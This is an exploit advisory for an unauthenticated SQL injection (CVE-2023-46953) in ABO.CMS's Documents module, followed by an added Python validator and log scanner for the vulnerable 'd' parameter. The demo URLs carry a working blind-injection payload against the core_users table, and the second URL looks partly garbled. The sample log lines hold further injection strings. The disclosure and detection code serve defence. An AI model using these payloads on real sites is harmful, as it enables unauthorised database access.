# Exploit Title: SQLi in ABO.CMS (Unauthenticated)
# Date: 25.10.2023
# Exploit Author: sadfox
# Vendor Homepage: https://abocms.ru
# Version: All editions of ABO.CMS
# Tested on: ABO.CMS 5.9.3
# CVE : CVE-2023-46953
# Status: HIGH-CRITICAL
# Reference: https://portswigger.net/web-security/sql-injection

Boolean-based SQL injection in the "Documents" module. The parameter d, which carries the date, is vulnerable. In Demo-1, the %27 character breaks the SQL syntax, resulting in a 500 error. In Demo-2, the payload correctly terminates the SQL syntax.

### Demo-1:
http://demo.target.ru/support/docs/?action=assortment&paretn=&c=test&d=14.10.2023%27

### Demo-2:
http://demo.target.ru/support/docs/?action=assortment&paretn=&c=test&d=14.10.2023/support/docs/?action=assortment&parent=&c=test&d=14.10.2023%27%20OR%20NOT%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20core_users%29%2C1%2C1%29%29%3E51%20OR%20%27Fjig%27%3D%27RbUH
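The defensive side of the above, as an added example that is not part of the advisory or of ABO.CMS: the module expects d to be a plain DD.MM.YYYY date, so a strict parse of that parameter rejects both demo requests before the value can reach a query, and the same check run over access-log request targets for /support/docs/ surfaces probing of d. The log lines are constructed; the path and parameter names are the ones the advisory shows.

```python
"""Strict validation of the `d` parameter plus a log scan for the
ABO.CMS Documents-module SQLi (CVE-2023-46953).
Added example, not code from the advisory or the vendor."""
from datetime import datetime
from urllib.parse import parse_qs, urlsplit


def is_valid_d(value: str) -> bool:
    """Accept only a plain DD.MM.YYYY date, the format the module expects.
    A stray quote, SQL keywords or a trailing path fragment all fail here."""
    try:
        datetime.strptime(value, "%d.%m.%Y")
    except ValueError:
        return False
    return True


def flag_request(url: str) -> bool:
    """True when a request to /support/docs/ carries a malformed `d`.
    parse_qs already percent-decodes, so %27 arrives as a quote."""
    parts = urlsplit(url)
    if not parts.path.startswith("/support/docs/"):
        return False
    values = parse_qs(parts.query, keep_blank_values=True).get("d", [])
    return any(not is_valid_d(v) for v in values)


# Constructed access-log-style lines: "METHOD target status".
SAMPLE_LOG = [
    "GET /support/docs/?action=assortment&parent=&c=test&d=14.10.2023 200",
    "GET /support/docs/?action=assortment&parent=&c=test&d=14.10.2023%27 500",
    "GET /support/docs/?action=assortment&parent=&c=test"
    "&d=14.10.2023%27%20OR%20%271%27%3D%271 200",
    "GET /other/?d=14.10.2023%27 200",
]


def scan_log(lines):
    """Return the request targets whose `d` does not parse as a date."""
    hits = []
    for line in lines:
        _method, target, _status = line.split(" ", 2)
        if flag_request(target):
            hits.append(target)
    return hits


if __name__ == "__main__":
    for target in scan_log(SAMPLE_LOG):
        print("suspicious d parameter:", target)
```

Only requests to the documents endpoint are considered, so the same malformed value on another path is not reported; widen the path check if other modules reuse the parameter.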